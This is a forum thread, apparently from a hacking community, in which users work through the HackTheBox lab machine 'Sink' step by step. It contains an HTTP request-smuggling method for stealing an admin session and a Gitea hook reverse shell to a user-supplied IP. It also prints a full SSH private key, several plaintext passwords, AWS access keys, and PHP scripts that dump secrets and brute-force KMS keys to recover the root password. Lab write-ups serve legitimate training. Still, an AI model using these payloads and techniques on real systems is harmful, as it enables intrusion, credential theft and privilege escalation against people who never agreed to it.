TUTORIAL SINK [DISCUSSION]
by 0xvijay - January 31, 2021 at 07:50 AM
#1
I Opened this thread to discuss about sink.htb

qucik nmap

22 - ssh

3000 - gittea

5000 - devops


And let's discuss about this below

sounds like http smuggling
Reply
#2
Yes, it looks like http smuggling. Also there is a WAF which is preventing us from bruteforcing and enumeration...
Reply
#3
curl -X POST -v http://10.10.10.225:5000/ -I -H 'User-Agent: Mozilla/5.0' -H 'Content-Length Kuku: 95'

HTTP/1.0 400 Bad request
< Server: haproxy 1.9.10
Server: haproxy 1.9.10

https://nathandavison.com/blog/haproxy-h...-smuggling
Reply
#4
Any updates with the foothold? I noticed that request smuggling vuln but I don't know what to do with it or how can it be used to give useful information.
Can someone at least confirm if it is the way to go?
Reply
#5
i got the first step:

1. turn on burp and listen to HTTP
2. register
3. send a comment
4. send the request to repeater
5. edit the request, so it looks like this:
[Image: xv36ioy.png]

In order to get the 0b in the chunked header:
1. write the base64 string "Cwo="  before chunked (in the Transfer-Encoding header)
2. press Ctrl + Shift + b  (this will base64 decode it)

after you send this request (only 1 time), the admin will do a request.
the request headers of the admin request can be read as a comment on the page /home
these will include the admins session key, which you can use to identify as admin

these are the notes you can read as admin, if you change your session key to the admin session key:
Chef Login : http://chef.sink.htb Username : chefadm Password : /6'fEGC&zEx{4]zz
Dev Node URL : http://code.sink.htb Username : root Password : [email protected]>Z3})zzfQ3
Nagios URL : https://nagios.sink.htb Username : nagios_adm Password : g8<H6GK\{*L.fB3C
Reply
#6
jeez! i had the correct payload all that time but i didn't know about that encoding/obfuscation step before chuncked. Thanks man that is so helpful
Reply
#7
*spoiler* rabbithole:Spoiler
gitea exploit to get rev shell:
https://www.fzi.de/en/news/news/detail-e...h-authent/

login as root in sink.htb:3000 password: [email protected]>Z3})zzfQ3
go to sink.htb:3000/root/Kinesis_ElasticSearch/settings/hooks/git
edit post-receive hook to reverse shell:

#!/bin/bash
bash -i >& /dev/tcp/YOUR_IP/9001 0>&1

start nc listener
push anything to the kinesis elasticsearch project (new file > commit changes)
profit

to get marcus id_rsa (after logging in to sink.htb:3000 as root with password [email protected]>Z3})zzfQ3) you have to just
visit: sink.htb:3000/root/Key_Management/commit/b01a6b7ed372d154ed0bc43a342a5e1203d07b1e

id_rsaSpoiler
-----BEGIN OPENSSH PRIVATE KEY-----
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
-----END OPENSSH PRIVATE KEY-----


ok root is a bit tricky...
i used php for this, but there are other tools to enumerate aws

the stuff from the gitea repos are hinting, that we should enumerate port 4566...
what i did:

1. download the repo at sink.htb:3000/root/Key_Management
2. create tunnel: ssh -N -L 4566:127.0.0.1:4566 -i id_rsa [email protected]
3. enumerate aws services: curl localhost:4566/health
4. create php files in the Key_Management repo to enumerate aws services (run php code like this: php file.php):
4.1
list secretsSpoiler
<?php
require 'vendor/autoload.php';

use 
Aws\SecretsManager\SecretsManagerClient;
use 
Aws\Exception\AwsException;

$client = new SecretsManagerClient([
        'region' => 'eu',
        'endpoint' => 'http://127.0.0.1:4566',
        'credentials' => [
                'key' => 'AKIAIUEN3QWCPSTEITJQ',
                'secret' => 'paVI8VgTWkPI3jDNkdzUMvK4CcdXO2T7sePX0ddF'
        ],
        'version' => 'latest'
]);
try {
$result $client->listSecrets(array(
));
var_dump($result);
}
catch (
AwsException $e) {
    echo $e->getMessage();
    echo "\n";

4.2
get secret valuesSpoiler
<?php
require 'vendor/autoload.php';

use 
Aws\SecretsManager\SecretsManagerClient;
use 
Aws\Exception\AwsException;

$client = new SecretsManagerClient([
        'region' => 'eu',
        'endpoint' => 'http://127.0.0.1:4566',
        'credentials' => [
                'key' => 'AKIAIUEN3QWCPSTEITJQ',
                'secret' => 'paVI8VgTWkPI3jDNkdzUMvK4CcdXO2T7sePX0ddF'
        ],
        'version' => 'latest'
]);

$secretIDs = ["arn:aws:secretsmanager:us-east-1:1234567890:secret:Jenkins Login-zwTEL",
    "arn:aws:secretsmanager:us-east-1:1234567890:secret:Sink Panel-yLXAA",
    "arn:aws:secretsmanager:us-east-1:1234567890:secret:Jira Support-nAWmk"];

try {
for (
$i=0$i<count($secretIDs); $i++) {
    $result $client->getSecretValue(array(
        'SecretId' => $secretIDs[$i],
    ));
    var_dump($result);
}
}
catch (
AwsException $e) {
    echo $e->getMessage();
    echo "\n";

5. in the secret values you find the creds of david = EALB=bcC=`a7f2#k
6. find the file /home/david/Projects/Prod_Deployment/servers.enc
7. we can decrypt the file with a key, that is stored in aws.
so we list the keys first with the php script called listkeys.php, which is already in the repo (first you must modify it so the version is "latest")
command: php listkeys.php | grep "string(36)" | cut -d " " -f 10
8.
create another php script to decrypt the file (i used base64 to encode and decode the file)Spoiler
<?php
require 'vendor/autoload.php';

use 
Aws\Kms\KmsClient;
use 
Aws\Exception\AwsException;

$KmsClient = new Aws\Kms\KmsClient([
    'profile' => 'default',
    'version' => '2014-11-01',
    'region' => 'eu',
    'endpoint' => 'http://127.0.0.1:4566'
]);

$keys = ["0b539917-5eff-45b2-9fa1-e13f0d2c42ac",
    "16754494-4333-4f77-ad4c-d0b73d799939",
    "2378914f-ea22-47af-8b0c-8252ef09cd5f",
    "2bf9c582-eed7-482f-bfb6-2e4e7eb88b78",
    "53bb45ef-bf96-47b2-a423-74d9b89a297a",
    "804125db-bdf1-465a-a058-07fc87c0fad0",
    "837a2f6e-e64c-45bc-a7aa-efa56a550401",
    "881df7e3-fb6f-4c7b-9195-7f210e79e525",
    "c5217c17-5675-42f7-a6ec-b5aa9b9dbbde",
    "f0579746-10c3-4fd1-b2ab-f312a5a0f3fc",
    "f2358fef-e813-4c59-87c8-70e50f6d4f70"];
$cipherb64 "mXMs+8ZLEp9krGLLJT2YHLgHQP/uRJYSfX+YTqar7wabvOQ8PSuPwUFAmEJh86q3kaURmnRxr/smZvkU6Pp0KPV7ye2sP10hvPJDF2mkNcIEVif3RaMU08jZi7U/ghZyoXseM6EEcu9c1gYpDqZ74CMEh7AoasksLswCJJZYI0TfcvTlXx84XBfCWsK7cTyDb4SughAq9MY89Q6lt7gnw6IwG/tSHi9a1MY8eblCwCMNwRrFQ44x8p3hS2FLxZe2iKUrpiyUDmdThpFJPcM3uxiXU+cuyZJgxzQ2Wl0Gqaj0RpVD2w2wJGrQBnCnouahOD1SXT3DwrUMWXyeNMc52lWo3aB+mq/uhLxcTeGSImHJcfUYYQqXoIrOHcS7O1WFoaMvMtIAl+uRslGVSEwiU6sVe9nMCuyvrsbsQ0N46jjro5h1nFmTmZ0C1Xr97Go/pHmJxgG1lxnOepsglLrPMXc5F6lFH1aKxlzFVAxGKWNAzTlzGC+HnBXjugLpP8Shpb24HPdnt/fF/dda8qyaMcYZCOmLODums2+ROtrPJ4CTuaiSbOWJuheQ6U/v5AbeQSF93RF28iyiA905SCNRi3ejGDH65OWv6aw1VnTf8TaREPH5ZNLazTW5Jo8kvLqJaEtZISRNUEmsJHr79U1VjpovPzePTKeDTR0qosW/GJ8=";

for (
$i=0$i<count($keys); $i++) {

try {
    $result $KmsClient->enableKey([
        'KeyId' => $keys[$i],
    ]);

    $result $KmsClient->decrypt([
        'CiphertextBlob' => base64_decode($cipherb64),
        'KeyId' => $keys[$i],
        'EncryptionAlgorithm' => 'RSAES_OAEP_SHA_256',
    ]);
    echo base64_encode($result["Plaintext"]);
}
catch (
AwsException $e) {
}

9.
now you can decode the base64 and extract the given fileSpoiler
echo -n "H4sIAAAAAAAAAytOLSpLLSrWq8zNYaAVMAACMxMTMA0E6LSBkaExg6GxubmJqbmxqZkxg4GhkYGhAYOCAc1chARKi0sSixQUGIry80vwqSMkP0RBMTj+rbgUFHIyi0tS8xJTUoqsFJSUgAIF+UUlVgoWBkBmRn5xSTFIkYKCrkJyalFJsV5xZl62XkZJElSwLLE0pwQhmJKaBhIoLYaYnZeYm2qlkJiSm5kHMjixuNhKIb40tSqlNFDRNdLU0SMt1YhroINiRIJiaP4vzkynmR2E878hLP+bGALZBoaG5qamo/mfHsCgsY3JUVnT6ra3Ea8jq+qJhVuVUw32RXC+5E7RteNPdm7ff712xavQy6bsqbYZO3alZbyJ22V5nP/XtANG+iunh08t2GdR9vUKk2ON1IfdsSs864IuWBr95xPdoDtL9cA+janZtRmJyt8crn9a5V7e9aXp1BcO7bfCFyZ0v1w6a8vLAw7OG9crNK/RWukXUDTQATEKRsEoGAWjYBSMglEwCkbBKBgFo2AUjIJRMApGwSgYBaNgFIyCUTAKRsEoGAWjYBSMglEwRAEATgL7TAAoAAA=" | base64 -d > servers.gz
gzip -d servers.gz
tar -xf servers
cat servers.yml

the root password is in the extracted file
Reply
#8
--------bump--------
Reply
#9
can you share the code you used to decrypt? I'm struggling to get mine to work - one key does give a result on decrypt but I only get gibberish back for the Plaintext - sending the file both as base64 encoded and binary - can't get it to work either way.

I was previously trying the awslocal kms cli but no luck their either - this step is killing me since it seems so finicky
Reply
#10
the code is in step 8.
you need to download the php repo and put my script into this folder
then execute it
Reply
#11
the aws key and secret can be found in Log_Management repo's commints
Reply
#12
(February 01, 2021 at 07:55 PM)randomname83 Wrote: i got the first step:

1. turn on burp and listen to HTTP
2. register
3. send a comment
4. send the request to repeater
5. edit the request, so it looks like this:
[Image: xv36ioy.png]

In order to get the 0b in the chunked header:
1. write the base64 string "Cwo="  before chunked (in the Transfer-Encoding header)
2. press Ctrl + Shift + b  (this will base64 decode it)

after you send this request (only 1 time), the admin will do a request.
the request headers of the admin request can be read as a comment on the page /home
these will include the admins session key, which you can use to identify as admin

these are the notes you can read as admin, if you change your session key to the admin session key:
Chef Login : http://chef.sink.htb Username : chefadm Password : /6'fEGC&zEx{4]zz
Dev Node URL : http://code.sink.htb Username : root Password : [email protected]>Z3})zzfQ3
Nagios URL : https://nagios.sink.htb Username : nagios_adm Password : g8<H6GK\{*L.fB3C

Hi bro, thanks for sharing.

I wondered where the CSRF token should come from as there is no CSRF Token set when I use the app and post comments/notes. Furthermore how did you actually found out which payload to send in the chunked request. I am getting the logic regarding bypassing the WAF with  the smuggeling but I don't get the logic behind the smuggeled request and why it ends up in making the admin a request that ends up in comments.

Maybe you can explain? Thx
Reply

Possibly Related Threads…
Thread Author Replies Views Last Post
TUTORIAL PWN Restaurant DISCUSSION n3m3n91 0 41 1 hour ago
Last Post: n3m3n91
TUTORIAL ATTENDED [DISCUSSION] 0xvijay 54 13,462 February 26, 2021 at 08:12 PM
Last Post: fullmetal
TUTORIAL Weather App [Discussion] n3m3n91 16 1,982 February 18, 2021 at 09:35 PM
Last Post: z3uz

 Users browsing this thread: 2 Guest(s)